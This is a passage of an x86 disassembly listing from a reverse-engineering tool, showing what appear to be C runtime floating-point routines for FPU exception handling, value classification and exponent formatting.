and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_4217DA
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_42705C ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_4212D3
and dword ptr [esi], 0FFFFFFFEh
loc_4212D3: ; CODE XREF: sub_4210AC+222�j
test byte ptr [eax+8], 8
jz short loc_4212DC
and dword ptr [esi], 0FFFFFFFBh
loc_4212DC: ; CODE XREF: sub_4210AC+22B�j
test byte ptr [eax+8], 4
jz short loc_4212E5
and dword ptr [esi], 0FFFFFFF7h
loc_4212E5: ; CODE XREF: sub_4210AC+234�j
test byte ptr [eax+8], 2
jz short loc_4212EE
and dword ptr [esi], 0FFFFFFEFh
loc_4212EE: ; CODE XREF: sub_4210AC+23D�j
test [eax+8], bl
jz short loc_4212F6
and dword ptr [esi], 0FFFFFFDFh
loc_4212F6: ; CODE XREF: sub_4210AC+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_42132A
dec ecx
jz short loc_42131E
dec ecx
jz short loc_421314
dec ecx
jnz short loc_42132C
or byte ptr [esi+1], 0Ch
jmp short loc_42132C
; ---------------------------------------------------------------------------
loc_421314: ; CODE XREF: sub_4210AC+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_421326
; ---------------------------------------------------------------------------
loc_42131E: ; CODE XREF: sub_4210AC+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_421326: ; CODE XREF: sub_4210AC+270�j
mov [esi], ecx
jmp short loc_42132C
; ---------------------------------------------------------------------------
loc_42132A: ; CODE XREF: sub_4210AC+257�j
and [esi], edx
loc_42132C: ; CODE XREF: sub_4210AC+260�j
; sub_4210AC+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_42134C
dec ecx
jz short loc_421343
dec ecx
jnz short loc_421355
and [esi], edx
jmp short loc_421355
; ---------------------------------------------------------------------------
loc_421343: ; CODE XREF: sub_4210AC+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_421353
; ---------------------------------------------------------------------------
loc_42134C: ; CODE XREF: sub_4210AC+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_421353: ; CODE XREF: sub_4210AC+29E�j
mov [esi], ecx
loc_421355: ; CODE XREF: sub_4210AC+291�j
; sub_4210AC+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4210AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42135F proc near ; CODE XREF: sub_421014+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_42138A
test byte ptr [ebp+arg_8], bl
jz short loc_42138A
push ebx
call sub_42180C
pop ecx
and edi, 0FFFFFFF7h
jmp loc_421554
; ---------------------------------------------------------------------------
loc_42138A: ; CODE XREF: sub_42135F+15�j
; sub_42135F+1A�j
test al, 4
jz short loc_4213A4
test byte ptr [ebp+arg_8], 4
jz short loc_4213A4
push 4
call sub_42180C
pop ecx
and edi, 0FFFFFFFBh
jmp loc_421554
; ---------------------------------------------------------------------------
loc_4213A4: ; CODE XREF: sub_42135F+2D�j
; sub_42135F+33�j
test al, bl
jz loc_42147E
test byte ptr [ebp+arg_8], 8
jz loc_42147E
push 8
call sub_42180C
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_421456
cmp ecx, 400h
jz short loc_42142E
cmp ecx, 800h
jz short loc_421406
cmp ecx, eax
jnz loc_421476
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_427878
fld dbl_43CF50
fnstsw ax
sahf
ja short loc_4213FE
fchs
loc_4213FE: ; CODE XREF: sub_42135F+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421474
; ---------------------------------------------------------------------------
loc_421406: ; CODE XREF: sub_42135F+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_427878
fnstsw ax
sahf
jbe short loc_42141E
fld dbl_43CF40
jmp short loc_421426
; ---------------------------------------------------------------------------
loc_42141E: ; CODE XREF: sub_42135F+B5�j
fld dbl_43CF50
fchs
loc_421426: ; CODE XREF: sub_42135F+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421474
; ---------------------------------------------------------------------------
loc_42142E: ; CODE XREF: sub_42135F+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_427878
fnstsw ax
sahf
jbe short loc_421446
fld dbl_43CF50
jmp short loc_42144E
; ---------------------------------------------------------------------------
loc_421446: ; CODE XREF: sub_42135F+DD�j
fld dbl_43CF40
fchs
loc_42144E: ; CODE XREF: sub_42135F+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421474
; ---------------------------------------------------------------------------
loc_421456: ; CODE XREF: sub_42135F+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_427878
fld dbl_43CF40
fnstsw ax
sahf
ja short loc_42146E
fchs
loc_42146E: ; CODE XREF: sub_42135F+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_421474: ; CODE XREF: sub_42135F+A5�j
; sub_42135F+CD�j ...
fstp qword ptr [ecx]
loc_421476: ; CODE XREF: sub_42135F+81�j
and edi, 0FFFFFFFEh
jmp loc_421554
; ---------------------------------------------------------------------------
loc_42147E: ; CODE XREF: sub_42135F+47�j
; sub_42135F+51�j
test al, 2
jz loc_421554
test byte ptr [ebp+arg_8], 10h
jz loc_421554
push esi
xor esi, esi
test al, 10h
jz short loc_421499
mov esi, ebx
loc_421499: ; CODE XREF: sub_42135F+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_427878
fnstsw ax
sahf
jz loc_421542
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_42170B
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_4214E4
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_421538
; ---------------------------------------------------------------------------
loc_4214E4: ; CODE XREF: sub_42135F+17A�j
fld [ebp+var_C]
fcomp dbl_427878
fnstsw ax
sahf
jnb short loc_4214F6
mov edx, ebx
jmp short loc_4214F8
; ---------------------------------------------------------------------------
loc_4214F6: ; CODE XREF: sub_42135F+191�j
xor edx, edx
loc_4214F8: ; CODE XREF: sub_42135F+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_42152C
sub eax, ecx
loc_42150F: ; CODE XREF: sub_42135F+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_42151A
test esi, esi
jnz short loc_42151A
mov esi, ebx
loc_42151A: ; CODE XREF: sub_42135F+1B3�j
; sub_42135F+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_421526
or byte ptr [ebp+var_C+3], 80h
loc_421526: ; CODE XREF: sub_42135F+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_42150F
loc_42152C: ; CODE XREF: sub_42135F+1AC�j
test edx, edx
jz short loc_421538
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_421538: ; CODE XREF: sub_42135F+183�j
; sub_42135F+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_421544
; ---------------------------------------------------------------------------
loc_421542: ; CODE XREF: sub_42135F+14E�j
mov esi, ebx
loc_421544: ; CODE XREF: sub_42135F+1E1�j
test esi, esi
pop esi
jz short loc_421551
push 10h
call sub_42180C
pop ecx
loc_421551: ; CODE XREF: sub_42135F+1E8�j
and edi, 0FFFFFFFDh
loc_421554: ; CODE XREF: sub_42135F+26�j
; sub_42135F+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_42156B
test byte ptr [ebp+arg_8], 20h
jz short loc_42156B
push 20h
call sub_42180C
pop ecx
and edi, 0FFFFFFEFh
loc_42156B: ; CODE XREF: sub_42135F+1F9�j
; sub_42135F+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_42135F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421576(int,int,int,int,int,int,double,int)
sub_421576 proc near ; CODE XREF: sub_420FC1+2B�p
; sub_421014+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_421624
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_4215E1
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_4217E9
lea eax, [ebp+var_20]
push eax
call sub_42401D
add esp, 0Ch
test eax, eax
jnz short loc_4215DB
push esi
call sub_4215FE
pop ecx
loc_4215DB: ; CODE XREF: sub_421576+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4215E1: ; CODE XREF: sub_421576+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_4217E9
push [ebp+arg_0]
call sub_4215FE
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_421576 endp
; =============== S U B R O U T I N E =======================================
sub_4215FE proc near ; CODE XREF: sub_421014+7D�p
; sub_421576+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_421619
jle short locret_421623
cmp eax, 3
jg short locret_421623
mov ds:dword_4DB958, 22h
retn
; ---------------------------------------------------------------------------
loc_421619: ; CODE XREF: sub_4215FE+7�j
mov ds:dword_4DB958, 21h
locret_421623: ; CODE XREF: sub_4215FE+9�j
; sub_4215FE+E�j
retn
sub_4215FE endp
; =============== S U B R O U T I N E =======================================
sub_421624 proc near ; CODE XREF: sub_421576+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_43CE68
loc_42162B: ; CODE XREF: sub_421624+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_421641
add eax, 8
inc ecx
cmp eax, offset dbl_43CF40
jl short loc_42162B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_421641: ; CODE XREF: sub_421624+D�j
mov eax, off_43CE6C[ecx*8]
retn
sub_421624 endp
; =============== S U B R O U T I N E =======================================
sub_421649 proc near ; CODE XREF: sub_421014+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_421655
push 5
jmp short loc_42166B
; ---------------------------------------------------------------------------
loc_421655: ; CODE XREF: sub_421649+6�j
test al, 8
jz short loc_42165D
push 1
jmp short loc_42166B
; ---------------------------------------------------------------------------
loc_42165D: ; CODE XREF: sub_421649+E�j
test al, 4
jz short loc_421665
push 2
jmp short loc_42166B
; ---------------------------------------------------------------------------
loc_421665: ; CODE XREF: sub_421649+16�j
test al, 1
jz short loc_42166D
push 3
loc_42166B: ; CODE XREF: sub_421649+A�j
; sub_421649+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_42166D: ; CODE XREF: sub_421649+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_421649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421676(double)
sub_421676 proc near ; CODE XREF: sub_41C679:loc_41C6FF�p
; sub_41C7BF:loc_41C845�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_421676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421688(double,int)
sub_421688 proc near ; CODE XREF: sub_42170B+82�p
; sub_42170B+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_421688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4216B1 proc near ; CODE XREF: sub_41C679+31�p
; sub_41C7BF+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_4216C8
cmp [ebp+arg_0], edx
jnz short loc_4216DA
push 1
jmp short loc_421704
; ---------------------------------------------------------------------------
loc_4216C8: ; CODE XREF: sub_4216B1+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_4216DA
cmp [ebp+arg_0], edx
jnz short loc_4216DA
push 2
jmp short loc_421704
; ---------------------------------------------------------------------------
loc_4216DA: ; CODE XREF: sub_4216B1+11�j
; sub_4216B1+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_4216ED
push 3
jmp short loc_421704
; ---------------------------------------------------------------------------
loc_4216ED: ; CODE XREF: sub_4216B1+36�j
cmp cx, 7FF0h
jnz short loc_421707
test [ebp+arg_4], 7FFFFh
jnz short loc_421702
cmp [ebp+arg_0], edx
jz short loc_421707
loc_421702: ; CODE XREF: sub_4216B1+4A�j
push 4
loc_421704: ; CODE XREF: sub_4216B1+15�j
; sub_4216B1+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421707: ; CODE XREF: sub_4216B1+41�j
; sub_4216B1+4F�j
xor eax, eax
pop ebp
retn
sub_4216B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42170B(double,int)
sub_42170B proc near ; CODE XREF: sub_42135F+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_427878
push esi
fnstsw ax
sahf
jnz short loc_42172B
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_4217C1
; ---------------------------------------------------------------------------
loc_42172B: ; CODE XREF: sub_42170B+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_42179A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_421743
cmp dword ptr [ebp+arg_0], ecx
jz short loc_42179A
loc_421743: ; CODE XREF: sub_42170B+31�j
fld [ebp+arg_0]
fcomp dbl_427878
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_42175B
push 1
pop eax
jmp short loc_42175D
; ---------------------------------------------------------------------------
loc_42175B: ; CODE XREF: sub_42170B+49�j
xor eax, eax
loc_42175D: ; CODE XREF: sub_42170B+4E�j
; sub_42170B+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_421776
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_421770
or dword ptr [ebp+arg_0+4], 1
loc_421770: ; CODE XREF: sub_42170B+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_42175D
; ---------------------------------------------------------------------------
loc_421776: ; CODE XREF: sub_42170B+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_421784
or byte ptr [ebp+arg_0+7], 80h
loc_421784: ; CODE XREF: sub_42170B+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_421688
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_4217C1
; ---------------------------------------------------------------------------
loc_42179A: ; CODE XREF: sub_42170B+28�j
; sub_42170B+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_421688
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_4217C1: ; CODE XREF: sub_42170B+1B�j
; sub_42170B+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_42170B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4217CC proc near ; CODE XREF: sub_4210AC+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_4217CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4217DA proc near ; CODE XREF: sub_4210AC+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_4217DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4217E9 proc near ; CODE XREF: sub_41C679+13�p
; sub_41C679+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_4217E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42180C proc near ; CODE XREF: sub_42135F+1D�p
; sub_42135F+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_421823
fld tbyte_43CF68
fistp [ebp+arg_0]
wait
loc_421823: ; CODE XREF: sub_42180C+B�j
test cl, 8
jz short loc_421838
fstsw ax
fld tbyte_43CF68
fstp [ebp+var_8]
wait
fstsw ax
loc_421838: ; CODE XREF: sub_42180C+1A�j
test cl, 10h
jz short loc_421847
fld tbyte_43CF74
fstp [ebp+var_8]
wait
loc_421847: ; CODE XREF: sub_42180C+2F�j
test cl, 4
jz short loc_421855
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_421855: ; CODE XREF: sub_42180C+3E�j
test cl, 20h
jz short locret_421860
fldpi
fstp [ebp+var_8]
wait
locret_421860: ; CODE XREF: sub_42180C+4C�j
leave
retn
sub_42180C endp
; =============== S U B R O U T I N E =======================================
sub_421862 proc near ; CODE XREF: sub_41C748+F�p
push 30000h
push 10000h
call sub_424055
pop ecx
pop ecx
retn
sub_421862 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421874 proc near ; CODE XREF: sub_4218B2:loc_4218D6�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_427888
fstp [ebp+var_8]
fld dbl_427880
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_427710
fnstsw ax
sahf
jbe short loc_4218AE
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4218AE: ; CODE XREF: sub_421874+33�j
xor eax, eax
leave
retn
sub_421874 endp
; =============== S U B R O U T I N E =======================================
sub_4218B2 proc near ; CODE XREF: sub_41C748+5�p
push offset aKernel32 ; "KERNEL32"
call dword_42709C ; GetModuleHandleA
test eax, eax
jz short loc_4218D6
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_4270BC ; GetProcAddress
test eax, eax
jz short loc_4218D6
push 0
call eax ; sub_41C748
retn
; ---------------------------------------------------------------------------
loc_4218D6: ; CODE XREF: sub_4218B2+D�j
; sub_4218B2+1D�j
jmp sub_421874
sub_4218B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4218DB proc near ; CODE XREF: sub_41F69F+3CB�p
; DATA XREF: sub_41C760+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_41D74C
cmp eax, 65h
pop ecx
jz short loc_42191B
loc_4218EF: ; CODE XREF: sub_4218DB+3E�j
inc esi
cmp dword_43CBE4, 1
jle short loc_421908
movsx eax, byte ptr [esi]
push 4
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_421917
; ---------------------------------------------------------------------------
loc_421908: ; CODE XREF: sub_4218DB+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_43C9D8
mov al, [ecx+eax*2]
and eax, 4
loc_421917: ; CODE XREF: sub_4218DB+2B�j
test eax, eax
jnz short loc_4218EF
loc_42191B: ; CODE XREF: sub_4218DB+12�j
mov cl, byte_43CBE8
mov al, [esi]
mov [esi], cl
inc esi
loc_421926: ; CODE XREF: sub_4218DB+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_421926
pop esi
retn
sub_4218DB endp
; =============== S U B R O U T I N E =======================================
sub_421935 proc near ; CODE XREF: sub_41F69F+3E2�p
; DATA XREF: sub_41C760+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_43CBE8
mov cl, [eax]
test cl, cl
jz short loc_421951
loc_421945: ; CODE XREF: sub_421935+1A�j
cmp cl, dl
jz short loc_421951
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_421945
loc_421951: ; CODE XREF: sub_421935+E�j
; sub_421935+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_421982
loc_421958: ; CODE XREF: sub_421935+34�j
mov cl, [eax]
test cl, cl
jz short loc_42196B
cmp cl, 65h
jz short loc_42196B
cmp cl, 45h
jz short loc_42196B
inc eax
jmp short loc_421958
; ---------------------------------------------------------------------------
loc_42196B: ; CODE XREF: sub_421935+27�j
; sub_421935+2C�j ...
mov ecx, eax
loc_42196D: ; CODE XREF: sub_421935+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_42196D
cmp [eax], dl
jnz short loc_421978
dec eax
loc_421978: ; CODE XREF: sub_421935+40�j
; sub_421935+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_421978
locret_421982: ; CODE XREF: sub_421935+21�j
retn
sub_421935 endp
; =============== S U B R O U T I N E =======================================
sub_421983 proc near ; DATA XREF: sub_41C760+28�o
; UPX0:off_43CF90�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_427878
fnstsw ax
sahf
jb short loc_421998
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_421998: ; CODE XREF: sub_421983+F�j
xor eax, eax
retn
sub_421983 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42199B proc near ; CODE XREF: sub_420510+430�p
; DATA XREF: sub_41C760+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_4219C4
lea eax, [ebp+var_8]
push eax
call sub_424518
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_4219C4: ; CODE XREF: sub_42199B+C�j
lea eax, [ebp+arg_8]
push eax
call sub_424545
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_42199B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219D9 proc near ; CODE XREF: sub_421C56+17�p
; sub_421CA0+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_4DB9F0, 0
push ebx
push esi
jz short loc_421A0E
mov ebx, [ebp+arg_8]
mov eax, ds:dword_4DB9EC
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_421CF1
pop ecx
pop ecx
jmp short loc_421A46
; ---------------------------------------------------------------------------
loc_421A0E: ; CODE XREF: sub_4219D9+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_4245E9
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_424572
add esp, 14h
loc_421A46: ; CODE XREF: sub_4219D9+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_421A52
mov byte ptr [eax], 2Dh
inc eax
loc_421A52: ; CODE XREF: sub_4219D9+73�j
test ebx, ebx
jle short loc_421A6A
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_43CBE8
mov eax, edi
pop edi
mov [eax], cl
loc_421A6A: ; CODE XREF: sub_4219D9+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp ds:byte_4DB9F0, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_41BEB0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_421A91
mov byte ptr [ecx], 45h
loc_421A91: ; CODE XREF: sub_4219D9+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_421AD6
mov ebx, [esi+4]
dec ebx
jns short loc_421AA5
neg ebx
mov byte ptr [ecx], 2Dh
loc_421AA5: ; CODE XREF: sub_4219D9+C5�j
inc ecx
cmp ebx, 64h
jl short loc_421ABC
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_421ABC: ; CODE XREF: sub_4219D9+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_421AD3
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_421AD3: ; CODE XREF: sub_4219D9+E7�j
add [ecx+1], bl
loc_421AD6: ; CODE XREF: sub_4219D9+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_4219D9 endp
; =============== S U B R O U T I N E =======================================
sub_421ADD proc near ; CODE XREF: sub_421C7D+13�p
; sub_421CA0+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_4DB9F0, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_421B18
mov eax, ds:dword_4DB9F4
mov ebx, [esp+10h+arg_8]
mov esi, ds:dword_4DB9EC
cmp eax, ebx
jnz short loc_421B48
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_421B48
; ---------------------------------------------------------------------------
loc_421B18: ; CODE XREF: sub_421ADD+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
